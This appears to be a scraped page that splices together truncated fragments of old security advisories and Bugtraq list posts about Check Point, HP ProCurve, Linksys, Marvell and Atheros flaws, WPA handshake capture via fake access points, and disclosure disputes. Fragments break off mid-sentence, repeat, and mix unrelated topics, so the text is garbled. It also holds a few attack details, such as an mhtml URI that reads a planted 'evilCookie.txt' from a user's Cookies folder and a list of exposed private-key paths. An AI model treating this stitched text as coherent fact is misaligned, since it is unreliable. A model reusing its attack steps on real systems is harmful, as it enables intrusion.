Next Page >>
point
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c02544568
Version: 1
HPSBGN02589 SSRT100296 rev.1 - HP ProCurve Access Points, Access Controllers, and Mobility Controllers, Privilege Escalation
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2010-10-13
Last Updated: 2010-10-13
SEC Consult Vulnerability Lab Security Advisory < 20110810-0 >
=======================================================================
title: Client-side remote file upload & command execution
product: Check Point SSL VPN On-Demand applications (signed
Java applet and ActiveX control)
* SSL Network Extender (SNX)
* SecureWorkSpace
* Endpoint Security On-Demand
supplied by Check Point Connectra or other security
gateways
Check Point Connectra R62 Login Script Injection Vulnerability
scip AG Vulnerability ID 4020 (09/04/2009)
http://www.scip.ch/?vuldb.4020
I. INTRODUCTION
Check Point Connectra is a so-called SSL-VPN solution, which allows
users to access a remote system using a regular web browser.
More information is available on the official product web site at the
Overview
========
Physical structures which employ automatically locking doors to secure
exit points expose a race condition which may allow unauthorized entry.
Impact
======
You are not wrong. However, in this case, the point is to capture "WPA
handshake"(not WPA key) in order to brute-force for WPA key. This attack
allows an attacker to capture your "WPA handshake" even though the
legitimate access point is not there. The attacker could create a fake
access point to steal "WPA handshake"(from a client) when you attend
conferences. This attack would not work with iPhone, iPad or other PCs
with Windows OS because they would discard fake probe response at the
first place.
Cc: <bugtraq@securityfocus.com>
Subject: Re: Android wireless accepts fake response (No interaction requires)
(Vulnerability ?)
You are not wrong. However, in this case, the point is to capture "WPA
handshake"(not WPA key) in order to brute-force for WPA key. This attack
allows an attacker to capture your "WPA handshake" even though the
legitimate access point is not there. The attacker could create a fake
access point to steal "WPA handshake"(from a client) when you attend
conferences. This attack would not work with iPhone, iPad or other PCs
Hash: SHA1
Dear Kousuke,
First of all, let me clarify that the disclosure process has been
entirely coordinated by me, and thus, Wagner, Conviso and Check Point
have no responsibilities over any mistake I eventually made.
Anyway, just to clarify your points:
> First, you must have reported to the developer, but in what way?
> that Chromium add a feature to mitigate this server-side problem by
> ignoring the RFC and prevent all links with an @ sign in them from
> working altogether like MSIE does or warn the user about such URLs
> like Firefox does? I am obviously missing something here, maybe you
> can elaborate even further?
The point is not of implementation. URL/URI specification provided in
the RFC is treated as standard benchmark but the point here is about the
security check which is not implemented in Chrome. Every time this issue
comes up, the point of status bar
link interpretation is discussed which is simply one point of just
showing the way links active in web page. The web page input problem is
Background
----------
Trango Broadband (www.trangobroadband.com) produce a line of unlicensed
5.3/5.8 Ghz point-to-multipoint broadband wireless radios which are used
by many wireless ISPs around the world to provide internet and private
office services to hard-to-reach customers.
Currently there is a flaw in the authentication mechanism of these radios
which, if an attacker knows some details, can allow interception of
R7-0038: Check Point Endpoint Security Server Information Disclosure
February 7, 2011
-- Vulnerability Details:
The Check Point Endpoint Security Server and Integrity Server products inadvertently expose a number of private directories through the web interface. These directories include the SSL private keys, sensitive configuration files (often containing passwords), and application binaries.
Examples of exposed files include:
https://server/conf/ssl/apache/integrity-smartcenter.cert
=======================================================================
title: Symlink Following and Second-Order Symlink
Vulnerabilities in Multiple Check Point Security Management Products
product: Check Point Security Management
* Multi-Domain Security Management / Provider-1
* SmartCenter
vulnerable version: multiple products, see sections below
fixed version: multiple products, see sections below
CVE number: CVE-2011-2664
impact: high
please let me call you in this way as Hugo talking with Hugo -Vazquez- sounds a bit confusing... :-)
Regarding with this:
>I think however that Check Point consideres >everyone with access to a
>Secure Platform system to be a trusted user. So >they will not regard these
issues with the priority you (Hugo Va¿½zqu) seem to bestow on it.
Right now -16 October 2007- Check Point as already accepted the flaws. Regarding to the privilege escalation to the "Expert" mode -standard root-, I should tell again that that is the minor problem. If you read the paper you will see that there are things more interesting to explore... Anyway, today, "googleing" a bit I found an interesting URL of the NIST:
"FIPS 140-2 Non-Proprietary Security Policy"
* Airline Product Set (ALPS)
* Serial Tunnel Code (STUN) and Block Serial Tunnel Code (BSTUN)
* Native Client Interface Architecture support (NCIA)
* Data-link switching (DLSw)
* Remote Source-Route Bridging (RSRB)
* Point to Point Tunneling Protocol (PPTP)
* X.25 for Record Boundary Preservation (RBP)
* X.25 over TCP (XOT)
* X.25 Routing
Information on how to determine whether an affected feature is
Vulnerability present also on firmware ver.3.04.03 (US)
Other models and/or firmware versions may be also affected.
Background Information:
Linksys WAP54G is a wireless access points that allow wireless clients
connectivity to wired networks.
Supported 802.11b and 802.11g protocols, with data rates up to 54Mbit/s.
Summary:
3. Technical Description.
This driver is in charge of intercepting when a packet arrives or is
sent. (Un)fortunately a simple user-mode program can modify some
callbacks in klim5.sys to point to a user-mode controlled address, just
by sending a specially crafted IOCTL request.So... we face a local
privilege escalation.Again.
.text:00011774 cmp ecx, 80052110h ; IOCTL
.text:0001177A jnz short loc_117E9
------
* Marvell Driver Null SSID Association Request Vulnerability
Summary:
------
* The wireless drivers in some Wi-Fi access points (such as the
MARVELL-based Netgear WN802T) do not correctly parse SSID information
element included in association requests. Most information elements are
used by the wireless access point and clients to advertise their
capabilities (regarding rates, network name, cryptographic
capabilities...). More precisely, the SSID is used by the access point
>But then there is the important concept of the "private 0day", a new
>vulnerability that a malicious person has but has not used yet.
But the point is there is no such thing as a 0day *vulnerability"; there's
a 0day exploit, an exploit in the wild before the vulnerability id
discovered.
By claiming all "new" vulnerabilities are 0day the term becomes completely
meaningless; by your reasoning there is no such thing as a non-0day
Check Point Zone Labs VSDATANT Multiple IOCTL Privilege Escalation
Vulnerabilities
iDefense Security Advisory 08.20.07
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 20, 2007
I. BACKGROUND
Zone Alarm products provide security solutions such as anti-virus,
Dear List,
I'm writing on behalf of the Check Point Vulnerability Discovery Team to publish the following vulnerability.
Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/
Memory corruption when Adobe Shockwave Player parses .dir media file (duplicated KEY* reference in mmap record)
CVE-2010-4088
Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/
Web commands injection through FTP Login in Synology Disk Station
CVE-2010-2453
INTRODUCTION
Synology Inc develops high-performance, reliable, versatile, and environmentally-friendly Network Attached Storage (NAS) products. Synology's goal
1. Rodrigo (or Wagner) reported this vulnerability to the developer
2. The developer released new version for fix the XSS
3. Rodrigo (and/or Wagner) confirmed that fix
4. Rodrigo reports this vulnerability to this list
However, this is not truth. The developer of cforms didn't fix this XSS at this point.
So what he has "fixed"? See the following diff::
--- cforms-v11.5/lib_ajax.php 2009-09-18 10:29:06.000000000 +0900
+++ cforms-v11.6.1/lib_ajax.php 2010-09-22 07:41:54.000000000 +0900
Advisory # 1:
TITLE
OS Command Injection Vulnerability in Aruba Remote Access Point
Diagnostic Web Interface.
SUMMARY
An OS command injection vulnerability has been discovered in the Aruba
------
* Atheros Driver Reserved Frame Vulnerability
Summary:
--------
* The wireless driver in some Wi-Fi access points (such as the
ATHEROS-based Netgear WNDAP330) do not correctly parse malformed
reserved management frames.
Assigned CVE:
-------------
-----Original Message-----
From: hvazquez@pentest.es [mailto:hvazquez@pentest.es]
Sent: Monday, October 01, 2007 6:16 AM
To: bugtraq@securityfocus.com
Subject: CheckPoint Secure Platform Multiple Buffer Overflows
Hi all,
we have published a paper about CheckPoint Firewall-1 vulnerabilities. The
platform tested is the Secure Platform R60. We have found many buffer
Hi all,
we have published a paper about CheckPoint Firewall-1 vulnerabilities. The platform tested is the Secure Platform R60. We have found many buffer overflows. Most of them are located in command line utilities that can be exploited locally. A very few of them maybe can be exploited remotely, we don't know...
It seems that there's no need to be worried about this vulnerabilities, as it seems that none of them can be exploited from remote -right now-. What looks interesting to us is the hacking process of the target of evaluation.
As many of you know, the Check Point Secure Platform R60 was certified with the EAL4+ Common Criteria assurance level.
Our tests to locate those vulnerabilities -many memory corruption problems- had been very simple so we are a bit scared about the degree of reliability of the CheckPoint development cycle. In the paper called: "Check Point VPN-1/FireWall-1 NGX Security Target Version 1.2.2" and prepared to achieve the certification, there is a statement like this: "the developer has systematically searched for vulnerabilities in the TOE and provides reasoning about why they cannot be exploited in the intended environment for the TOE".
Systematically? We have found several overflows simply by manual fuzzing arguments of binaries from command line....
------
* Marvell Driver Multiple Information Element Overflows
Summary:
--------
* The wireless drivers in some Wi-Fi access points (such as the
MARVELL-based Linksys WAP4400N) do not correctly parse information
elements included in association requests. Most information elements are
used by the wireless access point and clients to advertise their
capabilities (regarding rates, network name, cryptographic capabilities...).
To be clear, I fully understand that when operating in an advanced mode,
Microsoft claims that hibernate mode clears the cryptographic keys from
memory. This claim was tested and we did not recover keys after a
machine configured for the advanced mode went into a hibernating state.
However, my point was _not_ that in a very specific configuration you're
at risk directly after power off. If you get to direct the machine into
such a hibernated state, you may be just fine.
My point was that a machine configured with multi-factor authentication
is still at risk. Regardless of how many password dongles you use,
</SCRIPT>
</BODY>
</HTML>
- -----------/
Point your IE to the following URI, replacing USERNAME with the
currently logged in user name.
/-----------
mhtml:\\127.0.0.1\C$\Documents%20and%20Settings\USERNAME\Cookies\evilCookie.txt
You can disable the reporting feature. For information about how to disable the reporting component and how to prevent this tool from sending information to Microsoft, click the following article umber to view the article in the Microsoft Knowledge Base:
891716 (http://support.microsoft.com/kb/891716/) Deployment of the Microsoft Windows Malicious Software Removal Tool in an enterprise environment
======
Either I am missing the point of J. Oquendo's post, or the conclusions I think he reaches are speculation rather that established.
Cheers
Ken
> -----Original Message-----
------
* Marvell Driver EAPoL-Key Length Overflow
Summary:
--------
* The wireless drivers in some Wi-Fi access points (such as the
MARVELL-based Netgear WN802T) do not correctly parse malformed EAPoL-Key
packets. This packet is used for unicast/multicast key derivation (which
are called 4-way handshake and group key handshake) of any secure
wireless connection (WPA-PSK, WPA2-PSK, WPA-EAP, WPA2-EAP).
Next Page>>
|
